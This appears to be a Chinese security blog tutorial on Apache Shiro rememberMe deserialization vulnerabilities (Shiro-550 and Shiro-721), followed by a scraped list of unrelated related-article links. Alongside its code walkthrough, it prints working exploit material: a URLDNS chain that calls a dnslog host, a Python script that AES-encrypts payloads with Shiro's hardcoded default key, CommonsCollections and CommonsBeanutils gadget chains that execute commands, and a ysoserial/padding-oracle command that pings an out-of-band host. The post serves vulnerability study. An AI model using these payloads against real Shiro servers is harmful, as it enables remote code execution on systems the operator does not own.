红队蓝军
红队蓝军

shiro反序列化

shiro550

环境搭建

https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4

配置pom.xml

   

        javax.servlet

        jstl

        runtime

   

   

        javax.servlet

        servlet-api

        provided

   

   

        org.slf4j

        slf4j-log4j12

        runtime

   

   

        log4j

        log4j

        runtime

   

   

        net.sourceforge.htmlunit

        htmlunit

        2.6

        test

   

   

        org.apache.shiro

        shiro-core

   

   

        org.apache.shiro

        shiro-web

   

   

        org.mortbay.jetty

        jetty

        ${jetty.version}

        test

   

   

        org.mortbay.jetty

        jsp-2.1-jetty

        ${jetty.version}

        test

   

   

        org.slf4j

        jcl-over-slf4j

        runtime

   

   

        jstl

        jstl

        1.2

   

可能出现的问题

无法解析插件 org.apache.maven.plugins:maven-clean-plugin:2.5

主要原理是因为maven默认用的是外网,会导致有些插件无法下载成功

解决方式:

将maven设置为国内镜像

修改maven3中的settings.xml文件

路径:xxxx\InteLiJ\plugins\maven\lib\maven3\conf

将标签的内容替换为

mirrorId

central

Human Readable Name

http://repo1.maven.org/maven2/

alimaven

aliyun maven

http://central.maven.org/maven2

central

alimaven

aliyun maven

http://maven.aliyun.com/nexus/content/repositories/central/

central

junit

junit Address/

http://jcenter.bintray.com/

central

然后重启maven即可

只需要将压缩包中的web目录解压,然后作为网站根目录即可

漏洞分析

加密过程

在ildea里点击两下Shift,搜索rememberMeSuccessfulLogin

对用户名就行序列化操作

跟进serialize

继续跟进 跟进serialize,这里就是真实的序列化操作

执行完serialize函数加入encrypt

可以看到有一个cipherService.encrypt函数,它其实是将序列化的内容进行aes加密,而getEncryptionCipherKey函数是获取密钥的函数

跟进getEncryptionCipherKey函数,发现返回的是encryptionCioherKey这个属性

getEncryptionCipherKey为AbstractRememberMeManager类中的方法,因此我们自己看构造方法

这里定义了一个常量DEFAULT_CIPHER_KEY_BYTES

跟进到这里会发现setEncryptionCipherKey方法其实就是将DEFAULT_CIPHER_KEY_BYTES赋值给了encryptionCipherKey,在这里就获得了密钥

进入rememberSerializedIdentity方法,这个方法的作用其实就是添加cookie

加密过程就结束了

解密过程

搜索getRememberedIdentity

获取http的Request和Response

获取Cookie内容

这里就是解密过程

在这里调用了反序列化

由于原生的shrio是无法利用cc链的,因此我们在这里直接利用URLDNS这条链

URLDNS

import java.io.*;

import java.lang.reflect.Field;

import java.net.URL;

import java.util.HashMap;

public class urldns {

    public static void main(String[] args) throws Exception {

        HashMap hashMap = new HashMap();

        URL url = new URL("http://rmu2na.dnslog.cn");

        Field f = URL.class.getDeclaredField("hashCode");

        f.setAccessible(true);

        // 这步是防止写入时触发dns查询,详见下文序列化条件总结

        f.set(url, 1);

        hashMap.put(url, "foo");

        f.set(url, -1);


        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.out"));

        oos.writeObject(hashMap);

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("test.out"));

        ois.readObject();


    }

}

由于反序列化的内容是二进制文件,因此需要利用脚本进行加密操作

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def get_file(name):

    with open(name,'rb') as f:

        data = f.read()

    return data

def en_aes(data):

    BS = AES.block_size

    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

    iv = uuid.uuid4().bytes

    encryptor = AES.new(key, AES.MODE_CBC, iv)

    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))

    return base64_ciphertext

if __name__ == '__main__':

    data = get_file("test.out")

    print(en_aes(data))

这里需要将Cookie中的JSESSIONID=xxx;删除掉才会触发服务器重新读取Cookie

由于Shrio对resolveClass进行了修改,导致数组类无法加载,因此原生的cc链是无法直接使用的

有cc依赖

package com.naihe;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import javassist.CannotCompileException;

import javassist.ClassPool;

import javassist.CtClass;

import javassist.NotFoundException;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.keyvalue.TiedMapEntry;

import org.apache.commons.collections.map.LazyMap;

import java.io.*;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.util.Map;

public class cc {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, NotFoundException, CannotCompileException, ClassNotFoundException {

        //通过字节码构建恶意类

        ClassPool classPool= ClassPool.getDefault();

        String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

        classPool.appendClassPath(AbstractTranslet);

        CtClass payload=classPool.makeClass("CommonsCollections3");

        payload.setSuperclass(classPool.get(AbstractTranslet));

        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

        byte[] bytes=payload.toBytecode();

        //CC3

        TemplatesImpl templates = new TemplatesImpl();

        Class aClass = templates.getClass();

        Field nameField = aClass.getDeclaredField("_name");

        nameField.setAccessible(true);

        nameField.set(templates,"aaaa");

        Field bytecodesField = aClass.getDeclaredField("_bytecodes");

        bytecodesField.setAccessible(true);

        bytecodesField.set(templates,new byte[][]{bytes});

        //CC2

        InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);

        //CC6

        HashMap map = new HashMap<>();

        Map lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, templates);

        HashMap map2 = new HashMap<>();

        map2.put(tiedMapEntry,"bbb");

        lazyMap.remove(templates);

        Class c = LazyMap.class;

        Field factoryField = c.getDeclaredField("factory");

        factoryField.setAccessible(true);

        factoryField.set(lazyMap,invokerTransformer);

        serialize(map2);

    }

    public static void serialize(Object obj) throws IOException, ClassNotFoundException {

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));

        objectOutputStream.writeObject(obj);

        objectOutputStream.close();

        unserialize("test.out");

    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));

        Object object = objectInputStream.readObject();

        return object;

    }

}

无cc依赖

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import javassist.ClassPool;

import javassist.CtClass;

import org.apache.commons.beanutils.BeanComparator;

import java.io.*;

import java.lang.reflect.Field;

import java.util.PriorityQueue;

public class CB1 {

    // 修改值的方法,简化代码

    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{

        Field field = object.getClass().getDeclaredField(fieldName);

        field.setAccessible(true);

        field.set(object, value);

    }

    public static void main(String[] args) throws Exception {

        // 创建恶意类,用于报错抛出调用链

        ClassPool pool = ClassPool.getDefault();

        CtClass payload = pool.makeClass("EvilClass");

        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));

        payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");

        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

        byte[] evilClass = payload.toBytecode();

        TemplatesImpl templates = new TemplatesImpl();

        setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});

        setFieldValue(templates, "_name", "test");

        setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());

        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        PriorityQueue queue = new PriorityQueue(2, beanComparator);

        queue.add("1");

        queue.add("1");

        setFieldValue(beanComparator, "property", "outputProperties");

        setFieldValue(queue, "queue", new Object[]{templates, templates});

        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("test.out"));

        out.writeObject(queue);

        ObjectInputStream in = new ObjectInputStream(new FileInputStream("test.out"));

        in.readObject();

    }

}

shiro721

漏洞原理

Apapche Shiro RememberMe Cookie 默认通过 AES-128-CBC 模式加密 , 这种加密模式容易受到 Padding Oracle Attack( Oracle 填充攻击 ) , 攻击者可以使用有效的 RememberMe Cookie 作为 Paddding Oracle Attack 的前缀 , 然后精心构造 RememberMe Cookie 值来实现反序列化漏洞攻击.

复现步骤:

1. 登录网站并且获取 RememberMe Cookie 值

2. 使用 RememberMe Cookie 值来作为 Padding Oracle Attack 的前缀

3. 通过 Padding Oracle Attack 的攻击方式精心构造可利用的 YSoSerial 反序列化数据

4. 将构造好的反序列化数据填充到 RememberMe Cookie 字段中并发送 , 即可在目标服务器上执行任意代码

需要通过爆破获取密钥,才能生成正确的rememberme cookie

用java  -jar ysoserial-master-6eca5bc740-1.jar CommonsBeanutils1 "ping gj9qn9.dnslog.cn" > payload.class

python shiro_exp.py  http://127.0.0.1:8080/samples-web-1.4.1/account/  7y9G8wmu+3c94D0kaxohut34n3ldwNnWxmrT9DQDEiSrQ7agYNnci1mh+IYQLmL8cehaMPcnBDclNaEN6eZrPvsEX7eApt5SJEZkmow+ZPsEsnh4wrnHoe7p8RjGVu6P/onx7nrFzZln9d4RC1N8vxEVPUlYZXU7xsMRs35Q8ziFH1EJ1jl/5eiDTn7Wx3yLbHCPyg6v+Qu5ADD+AMbvdHzlLOwY8Pfm5uqEKp36jIwsZjDcQJRhwyUjhAuRyqSUEFKzAq95XUYRaBKKsoxQwN6gD4z7G6lAIBY880CP0QIMhImmbHVfJti/rrnJ/RsxJtoeIH8TujlsEvcCGbJ3Od2XDbhilQUT57XralFArZB7tVCQE9/Vdce96jzR1TjD2rsPbg77eEUXOWbwkYBkJxFBex+p/YrLeJnxm9IvDijGHH2pZp9kCkej7uc8qPm+rH+V3xE0ChIxZXF5l9ScPsvHLJD+gAhgszg75pQnLiS5SOPG73GCj2gFFzzsKnCB  payload.class

检测工具

工具:

https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/download/v2.51/ShiroExploit.V2.51.7z

你可能感兴趣的:(shiro反序列化)

  • Go语言反射机制详解:通过反射获取结构体的字段和方法 dc爱傲雪和技术 Gogolang算法开发语言
    在Go语言中,反射(Reflection)是一种强大的工具,允许我们在程序运行时动态地检查和修改变量的类型、反射在很多场景中都有广泛的应用,如ORM(对象关系映射)框架、序列化与反序列化工具等。一、反射的基本概念在Go语言中,反射的核心包是reflect,它提供了一些列函数和方法来处理类型和值。理解反射的核心是两个概念:Type和Value。Type:表示变量的类型,如int、string、str
  • 八月刷题总结 Uzero. ctf
    2021DASCTFJulyXCBCTF--catflag考察日志文件位置,escapeshellarg函数绕过DASCTFJulyXCBCTF4th--ezrceYAPIMock远程代码执行漏洞BUUCTF--[HarekazeCTF2019]EasyNotesSESSION反序列化BUUCTF--[SWPU2019]Web3伪造Session,生成linux中的软链接BUUCTF--[wate
  • 2025.2.1——七、Web_php_unserialize 代码审计 然然阿然然 “破晓”计划第一阶段训练php网络安全学习安全网络
    题目来源:攻防世界Web_php_unserialize目录一、打开靶机,整理信息二、解题思路step1:代码审计step2:绕过漏洞1.绕过__wakeup()2.绕过正则step3:脚本运行三、小结一、打开靶机,整理信息熟悉的代码审计,根据题目名称,还涉及到反序列化知识点二、解题思路step1:代码审计file=$file;//将传入的file参数赋值给当前对象的$file属性}functio
  • 基于SSM的大王门店管理系统设计与实现 qq1744828575 javajava
    目录摘要IAbstractII引言11相关技术31.1SSM31.1.1Spring31.1.2SpringMVC31.1.3MyBatis41.2Shiro41.3前端技术41.3.1Bootstrap41.3.2jQuery41.3.3Ajax51.3.4Layui51.3.5Thymeleaf51.4本章小结62系统分析72.1功能需求分析72.2非功能需求113系统设计133.1系统总体设
  • java 字符串日期字段格式化前端显示 qq_36608622 java开发语言
    在Java应用程序中,如果你有一个字符串类型的日期字段,并希望将其格式化后显示在前端,可以通过多种方式实现。这通常涉及到在后端将字符串转换为Date或LocalDateTime等对象,然后使用适当的注解或配置来确保它们以正确的格式序列化为JSON发送到前端。以下是几种常见方法:方法一:使用@JsonFormat注解(Jackson)如果你使用的是Jackson来处理JSON序列化和反序列化,可以在
  • java FastJSON自定义序列化和反序列化(扩展点)方法总结!10个步骤让你轻松掌握 墨瑾轩 一起学学Java【一】开发语言java
    关注墨瑾轩,带你探索编程的奥秘!超萌技术攻略,轻松晋级编程高手技术宝库已备好,就等你来挖掘订阅墨瑾轩,智趣学习不孤单即刻启航,编程之旅更有趣嘿,小伙伴们!今天我们要一起探讨一个非常实用的话题——如何使用FastJSON自定义序列化和反序列化。你知道吗?FastJSON是阿里巴巴开源的一个高性能JSON库,广泛应用于Java项目中。虽然FastJSON提供了丰富的内置功能,但有时候我们还需要根据具体
  • 基于Maven的Spring/SpringMVC/Mybatis/Mybatis-plus/Apache-Shiro基础环境配置 weixin_30685029 javajson测试
    记录一下,以便不时之需。pom.xml122.534.2.5.RELEASE41.8.9563.4.071.3.089101.1.7110.1.4121.7.211314151.0.18165.1.381718191.2.22021224.122324252627javax.servlet28servlet-api29${servlet-api.version}30provided31323334
  • Python——Pickle库 Devin01213
    pickle是python语言的一个标准模块,安装python后已包含pickle库,不需要单独再安装。那么为什么需要序列化和反序列化这一操作呢?1.便于存储。序列化过程将文本信息转变为二进制数据流。这样就信息就容易存储在硬盘之中,当需要读取文件的时候,从硬盘中读取数据,然后再将其反序列化便可以得到原始的数据。在Python程序运行中得到了一些字符串、列表、字典等数据,想要长久的保存下来,方便以后
  • python中的序列化 fate252 Pythonpython序列化picklejson
    序列化(picking)把不方便存储或不可传输的对象转换为可存储或可传输的数据的过程称之为序列化。序列化之后,就可以把序列化后的内容写入磁盘,或者通过网络传输到别的机器上。反过来,把从磁盘或网络得到的序列化数据重建为对象的过程称之为反序列化(unpickling)。序列化和反序列化实际是为了通用存储或传输而编码和解码的过程。举例:网络游戏mabi洛奇的存档功能,当每次不想玩的时候就可以存档到服务器
  • Java中String类型的字符串转换成JSON对象和JSON字符串 柳小同学 javajson
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录一、Java字符串String类型转换成Json对象二、序列化1.引入fastjson依赖2.序列化的使用三、反序列化1.引入fastjson依赖2.反序列化的使用一、Java字符串String类型转换成Json对象在开发中会遇到接收前端传入一个Json对象,然后Json对象里面又有一个字段是Json字符串,例如{"code"
  • 八股——Java基础(四) 八月五 面试题java
    目录一、泛型1.Java中的泛型是什么?2.使用泛型的好处是什么?3.Java泛型的原理是什么?什么是类型擦除?4.什么是泛型中的限定通配符和非限定通配符?5.List和List之间有什么区别?6.可以把List传递给一个接受List参数的方法吗?7.Array中可以用泛型吗?8.判断ArrayList与ArrayList是否相等?二、序列化1.Java序列化与反序列化是什么?2.为什么需要序列化
  • ctf python大法好_【技术分享】记CTF比赛中发现的Python反序列化漏洞 weixin_39631370 ctfpython大法好
    预估稿费:200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安
  • PyQt4 的图片切割编辑器 烛火萤辉 Pythonpythonpyqt
    一、编辑器功能明确允许用户加载图片、选择切割模式、对切割后的图片片段进行操作(如移动、复制、粘贴、删除等),并支持撤销和重做操作。环境:Py2.7PyQt4.11二、导入模块介绍sys:用于访问与Python解释器强相关的变量和函数。os:提供操作系统相关功能,如文件路径操作。random:用于生成随机数,主要用于自动保存文件名。json:用于数据序列化和反序列化,方便保存和加载编辑状态。glob
  • @JsonCreator 注解 huang_hai_an javaajaxjavascript
    @JsonCreator注解是Jackson库中用于指定如何从JSON数据创建Java对象实例的一个重要工具。它允许你定义一个静态方法(通常是构造函数或静态工厂方法),Jackson在反序列化时会调用这个方法来生成对象实例。@JsonCreator注解可以应用于方法、构造函数或注解类型,并且可以通过mode()属性指定不同的工作模式。@JsonCreator注解的组成部分@Target:指定该注解
  • Shiro框架源码学习笔记 a88729845 shiro
    文章目录介绍认证术语如何使用Shiro的认证1.手机认证主体和凭据2.提交认证主体和凭据到认证系统3.允许访问,重新认证,或阻止访问"RememberMeSupport"RememberedvsAuthenticated登出授权授权三要素权限权限的粒度角色隐式的角色显式的角色(推荐)用户Shiro如何执行授权编程式授权角色检查权限检查实现`Permission`接口的方式使用`String`表示一
  • 《Apache Shiro 源码解析》- 11.Shiro 对 Spring 的支持 大漠穷秋9527 《ApacheShiro源码解析》apachespringjavaShiro权限管理后端
    11.Shiro对Spring的支持Shiro的第一个版本发布于2004年,Spring项目起源于2002年,在Shiro最初的版本中没有与Spring相关的内容。后来,随着Spring的流行,从2010年开始,Shiro开始提供对Spring的支持,推出了一个独立的jar包,名为shiro-spring。从2018年开始,Shiro在v1.4中开始增强对SpringBoot的支持。在本章中,我们
  • 详解Python Google Protocol Buffer 职场亮哥
    本篇主要介绍如何在Python语言中使用GoogleProtocolBuffer(后续都简写为PB),包括以下几个部分:为什么要使用PB?安装GooglePB自定义.proto文件编译.proto文件解析目标py文件序列化和反序列化更复杂的Message动态编译为什么要使用PB?PB(ProtocolBuffer)是Google开发的用于结构化数据交换格式,作为腾讯云日志服务标准写入格式。因此用于
  • 【详解】RedisTemplate序列化、反序列化扩展支持FastJson:GenericFastJson2JsonRedisSerializer 牛肉胡辣汤 redis
    目录RedisTemplate序列化、反序列化扩展支持FastJson:GenericFastJson2JsonRedisSerializer1.为什么需要自定义序列化器?2.实现GenericFastJson2JsonRedisSerializer2.1引入依赖2.2编写序列化器2.3配置RedisTemplate3.测试自定义序列化器1.添加依赖2.创建自定义的GenericFastJson2
  • spring security解析----架构解读 梦醉天下 编程安全springsecurity
    之前写了一个关于session的,看到大家现在用springsecurity还挺多,相比当时我开始用的时候,大家都在shiro。就写几篇关于springsecurity实践以后的总结吧。先从整体的springsecurity架构设计谈谈。(后面很多内容都是借用官网最新文档)springsecurity是spring框架下的安全解决方案,从刚开始到现在,已经经历了很多版本,但是总的架构设计没有变化。
  • Java创建型模式(一)——单例设计模式(饿汉式、懒汉式、枚举式,以及序列化反序列化破环单例模式和反射破环单例模式及破环单例模式的解决办法 | 完成详解,附有代码+案例) 蔚一 Java知识java设计模式开发语言intellij-idea单例模式
    文章目录单例设计模式4.1.1单例模式的结构4.1.2单例模式的实现4.1.2.1饿汉式-静态变量方式4.1.2.2饿汉式-静态代码块方式4.1.2.3懒汉式-线程不安全4.1.2.4懒汉式-线程安全4.1.2.5懒汉式-双重检查锁4.1.2.6饿汉式—枚举类4.3单例模式存在的问题4.3.1序列化反序列化破环单例模式4.3.2反射破环单例模式4.4解决单例模式存在的问题4.4.1序列化、反序列方
  • 企业级应用框架guns架构与开发实践 福建低调
    本文还有配套的精品资源,点击获取简介:在IT领域,企业架构是组织信息和技术集成设计的关键。"guns"项目提供了一套高效、灵活且可扩展的企业管理架构设计框架。本文深入探讨guns项目的核心特性、应用场景和开发实践,以及如何使用不同的集成开发环境(IDE)进行项目开发。guns基于SpringBoot框架,集成MyBatis和Shiro,简化了微服务开发和权限控制,确保了数据安全。文章还详细介绍了g
  • Flink之kafka消息解析器2 怎么才能努力学习啊 flinkkafka大数据
    概要昨天的话题,FlinkSource消费kafka数据自定义反序列化,获取自己想要的数据和类型实现过程publicclassTestWithMetadataDeserializationSchemaimplementsKafkaRecordDeserializationSchema{第一步:自定义实现这个接口,这里的泛型一般的都是自定义类@Overridepublicvoiddeserializ
  • JAVA中的ObjectOutputStream类 程序研 javaI/Ojava后端I/O开发语言
    ObjectOutputStream是Java中用于序列化对象的一种输出流,它可以将Java对象的状态信息转换为字节流,以便于存储或通过网络传输。序列化是将对象转换为字节流的过程,而反序列化则是将字节流恢复为对象的过程。本文将详细介绍ObjectOutputStream的原理、使用方法以及相关代码例子。一、ObjectOutputStream简介概述ObjectOutputStream是Java.
  • 序列化和反序列化 Json 字符串 @JsonProperty 小林想被监督学习 类以及方法json
    @JsonProperty是JacksonJSON库中的一个注解,用于控制JSON序列化和反序列化过程中字段的映射。具体来说,它可以帮助开发者指定JSON对象中的键名,以及控制字段的序列化和反序列化行为。以下是@JsonProperty注解的详细说明和常见用法:基本用法指定JSON键名:用于将Java类中的字段映射为JSON对象中的键名。例如,@JsonProperty("Mid")表示在JSON
  • RuoYi(若依)框架的介绍与基本使用(超详细分析) 涔溪 前端框架ruoyi
    **RuoYi(若依)**是一个基于SpringBoot和SpringCloud的企业级快速开发平台。它集成了多种常用的技术栈和中间件,旨在帮助企业快速构建稳定、高效的应用系统。以下是关于RuoYi框架的详细介绍和基本使用教程,涵盖了从环境搭建到核心功能的使用。RuoYi框架简介1.技术栈后端技术:SpringBoot,MyBatis,Druid,Redis,Shiro/SpringSecurit
  • 深入探索C#中Newtonsoft.Json库的高级进阶之路 步、步、为营 c#jsonphp
    引言在C#开发的广袤天地中,数据的序列化与反序列化是构建高效、灵活应用程序的关键环节。而Newtonsoft.Json库,作为这一领域的璀璨明星,以其强大的功能和出色的性能,成为了众多开发者的首选工具。它不仅仅是一个简单的JSON处理库,更是一把能够解锁复杂数据处理场景的万能钥匙。无论是在构建WebAPI时,需要将服务器端的对象快速转换为JSON格式,以便在网络中传输;还是在处理复杂的配置文件,需
  • C++ XML对象序列化与反序列化 zccmid c++xml算法windowsvisualstudiogithub
    一、序列化与反序列化  序列化是将一个对象转换为一种特定的格式或字符串表示,以便可以在不同的系统或程序之间进行传输或存储。序列化通常涉及将一个对象的属性值编码为字节流或字符流,并将其写入文件、网络流或其他媒介中。序列化后的数据可以在需要时进行反序列化,以便重新创建原始的对象。  反序列化是将序列化后的数据还原回原始对象的过程,即将序列化后的数据重新解码为原始对象的属性值。它通常涉及从文件、网络流或
  • QT开发技术 【基于TinyXml2的对类进行序列化和反序列化】一 增援未来章北海 QTC++学习qt数据库算法
    一、对TinyXml2进行封装使用宏实现序列化和反序列化思路:利用宏增加一个类函数,使用序列化器调用函数进行序列化封装宏示例#defineXML_SERIALIZER_BEGIN(ClassName)\public:\virtualvoidToXml(XMLElement*parentElem,boolbSerialize=true){\if(bSerialize){\parentElem->Se
  • SerializeJava-反序列化图形化工具 首席CEO 网络安全web安全Java
    公众号:泷羽Sec-Ceo声明!所提供的工具资料仅供学习之用。这些资料旨在帮助用户增进知识、提升技能,并促进个人成长与学习。用户在使用这些资料时,应严格遵守相关法律法规,不得将其用于任何非法、欺诈、侵权或其他不当用途。本人和团队不对用户因使用这些资料而产生的任何后果负责,包括但不限于因操作不当、误解资料内容或违反法律法规而导致的损失或损害。用户应自行承担使用这些资料的风险,并在使用前进行充分的了解
  • CTF题型 Python中pickle反序列化进阶利用&;例题&;opache绕过 PDD工程师 程序员python开发语言
    题目分析:`app.config['SECRET_KEY']=os.urandom(2).hex()`secret\_key是弱密钥可以爆破进行伪造@app.route(‘/path:note\_id’,methods=[‘GET’])defview_note(note_id):notes=session.get(‘notes’)ifnotnotes:returnrender_template(‘
  • Java实现的简单双向Map,支持重复Value superlxw1234 java双向map
    关键字:Java双向Map、DualHashBidiMap     有个需求,需要根据即时修改Map结构中的Value值,比如,将Map中所有value=V1的记录改成value=V2,key保持不变。   数据量比较大,遍历Map性能太差,这就需要根据Value先找到Key,然后去修改。   即:既要根据Key找Value,又要根据Value
  • PL/SQL触发器基础及例子 百合不是茶 oracle数据库触发器PL/SQL编程
      触发器的简介; 触发器的定义就是说某个条件成立的时候,触发器里面所定义的语句就会被自动的执行。因此触发器不需要人为的去调用,也不能调用。触发器和过程函数类似 过程函数必须要调用,   一个表中最多只能有12个触发器类型的,触发器和过程函数相似 触发器不需要调用直接执行, 触发时间:指明触发器何时执行,该值可取: before:表示在数据库动作之前触发
  • [时空与探索]穿越时空的一些问题 comsci 问题
          我们还没有进行过任何数学形式上的证明,仅仅是一个猜想.....       这个猜想就是; 任何有质量的物体(哪怕只有一微克)都不可能穿越时空,该物体强行穿越时空的时候,物体的质量会与时空粒子产生反应,物体会变成暗物质,也就是说,任何物体穿越时空会变成暗物质..(暗物质就我的理
  • easy ui datagrid上移下移一行 商人shang js上移下移easyuidatagrid
    /** * 向上移动一行 * * @param dg * @param row */ function moveupRow(dg, row) { var datagrid = $(dg); var index = datagrid.datagrid("getRowIndex", row); if (isFirstRow(dg, row)) {
  • Java反射 oloz 反射
    本人菜鸟,今天恰好有时间,写写博客,总结复习一下java反射方面的知识,欢迎大家探讨交流学习指教 首先看看java中的Class package demo; public class ClassTest { /*先了解java中的Class*/ public static void main(String[] args) { //任何一个类都
  • springMVC 使用JSR-303 Validation验证 杨白白 springmvc
    JSR-303是一个数据验证的规范,但是spring并没有对其进行实现,Hibernate Validator是实现了这一规范的,通过此这个实现来讲SpringMVC对JSR-303的支持。 JSR-303的校验是基于注解的,首先要把这些注解标记在需要验证的实体类的属性上或是其对应的get方法上。 登录需要验证类 public class Login { @NotEmpty
  • log4j 香水浓 log4j
    log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, HTML, DATABASE #log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, ROLLINGFILE, HTML #console log4j.appender.STDOUT=org.apache.log4j.ConsoleAppender log4
  • 使用ajax和history.pushState无刷新改变页面URL agevs jquery框架Ajaxhtml5chrome
    表现 如果你使用chrome或者firefox等浏览器访问本博客、github.com、plus.google.com等网站时,细心的你会发现页面之间的点击是通过ajax异步请求的,同时页面的URL发生了了改变。并且能够很好的支持浏览器前进和后退。 是什么有这么强大的功能呢? HTML5里引用了新的API,history.pushState和history.replaceState,就是通过
  • centos中文乱码 AILIKES centosOSssh
    一、CentOS系统访问 g.cn ,发现中文乱码。 于是用以前的方式:yum -y install fonts-chinese CentOS系统安装后,还是不能显示中文字体。我使用 gedit 编辑源码,其中文注释也为乱码。       后来,终于找到以下方法可以解决,需要两个中文支持的包: fonts-chinese-3.02-12.
  • 触发器 baalwolf 触发器
    触发器(trigger):监视某种情况,并触发某种操作。 触发器创建语法四要素:1.监视地点(table) 2.监视事件(insert/update/delete) 3.触发时间(after/before) 4.触发事件(insert/update/delete) 语法: create trigger triggerName after/before 
  • JS正则表达式的i m g bijian1013 JavaScript正则表达式
            g:表示全局(global)模式,即模式将被应用于所有字符串,而非在发现第一个匹配项时立即停止。         i:表示不区分大小写(case-insensitive)模式,即在确定匹配项时忽略模式与字符串的大小写。         m:表示
  • HTML5模式和Hashbang模式 bijian1013 JavaScriptAngularJSHashbang模式HTML5模式
            我们可以用$locationProvider来配置$location服务(可以采用注入的方式,就像AngularJS中其他所有东西一样)。这里provider的两个参数很有意思,介绍如下。 html5Mode         一个布尔值,标识$location服务是否运行在HTML5模式下。 ha
  • [Maven学习笔记六]Maven生命周期 bit1129 maven
    从mvn test的输出开始说起   当我们在user-core中执行mvn test时,执行的输出如下:   /software/devsoftware/jdk1.7.0_55/bin/java -Dmaven.home=/software/devsoftware/apache-maven-3.2.1 -Dclassworlds.conf=/software/devs
  • 【Hadoop七】基于Yarn的Hadoop Map Reduce容错 bit1129 hadoop
    运行于Yarn的Map Reduce作业,可能发生失败的点包括 Task Failure Application Master Failure Node Manager Failure Resource Manager Failure 1. Task Failure 任务执行过程中产生的异常和JVM的意外终止会汇报给Application Master。僵死的任务也会被A
  • 记一次数据推送的异常解决端口解决 ronin47 记一次数据推送的异常解决
       需求:从db获取数据然后推送到B         程序开发完成,上jboss,刚开始报了很多错,逐一解决,可最后显示连接不到数据库。机房的同事说可以ping 通。     自已画了个图,逐一排除,把linux 防火墙 和 setenforce 设置最低。    service iptables stop
  • 巧用视错觉-UI更有趣 brotherlamp UIui视频ui教程ui自学ui资料
    我们每个人在生活中都曾感受过视错觉(optical illusion)的魅力。 视错觉现象是双眼跟我们开的一个玩笑,而我们往往还心甘情愿地接受我们看到的假象。其实不止如此,视觉错现象的背后还有一个重要的科学原理——格式塔原理。 格式塔原理解释了人们如何以视觉方式感觉物体,以及图像的结构,视角,大小等要素是如何影响我们的视觉的。 在下面这篇文章中,我们首先会简单介绍一下格式塔原理中的基本概念,
  • 线段树-poj1177-N个矩形求边长(离散化+扫描线) bylijinnan 数据结构算法线段树
    package com.ljn.base; import java.util.Arrays; import java.util.Comparator; import java.util.Set; import java.util.TreeSet; /** * POJ 1177 (线段树+离散化+扫描线),题目链接为http://poj.org/problem?id=1177
  • HTTP协议详解 chicony http协议
    引言                                 
  • Scala设计模式 chenchao051 设计模式scala
    Scala设计模式                我的话: 在国外网站上看到一篇文章,里面详细描述了很多设计模式,并且用Java及Scala两种语言描述,清晰的让我们看到各种常规的设计模式,在Scala中是如何在语言特性层面直接支持的。基于文章很nice,我利用今天的空闲时间将其翻译,希望大家能一起学习,讨论。翻译
  • 安装mysql daizj mysql安装
    安装mysql   (1)删除linux上已经安装的mysql相关库信息。rpm  -e  xxxxxxx   --nodeps (强制删除)      执行命令rpm -qa |grep mysql 检查是否删除干净   (2)执行命令  rpm -i MySQL-server-5.5.31-2.el
  • HTTP状态码大全 dcj3sjt126com http状态码
    完整的 HTTP 1.1规范说明书来自于RFC 2616,你可以在http://www.talentdigger.cn/home/link.php?url=d3d3LnJmYy1lZGl0b3Iub3JnLw%3D%3D在线查阅。HTTP 1.1的状态码被标记为新特性,因为许多浏览器只支持 HTTP 1.0。你应只把状态码发送给支持 HTTP 1.1的客户端,支持协议版本可以通过调用request
  • asihttprequest上传图片 dcj3sjt126com ASIHTTPRequest
    NSURL *url =@"yourURL"; ASIFormDataRequest*currentRequest =[ASIFormDataRequest requestWithURL:url]; [currentRequest setPostFormat:ASIMultipartFormDataPostFormat];[currentRequest se
  • C语言中,关键字static的作用 e200702084 C++cC#
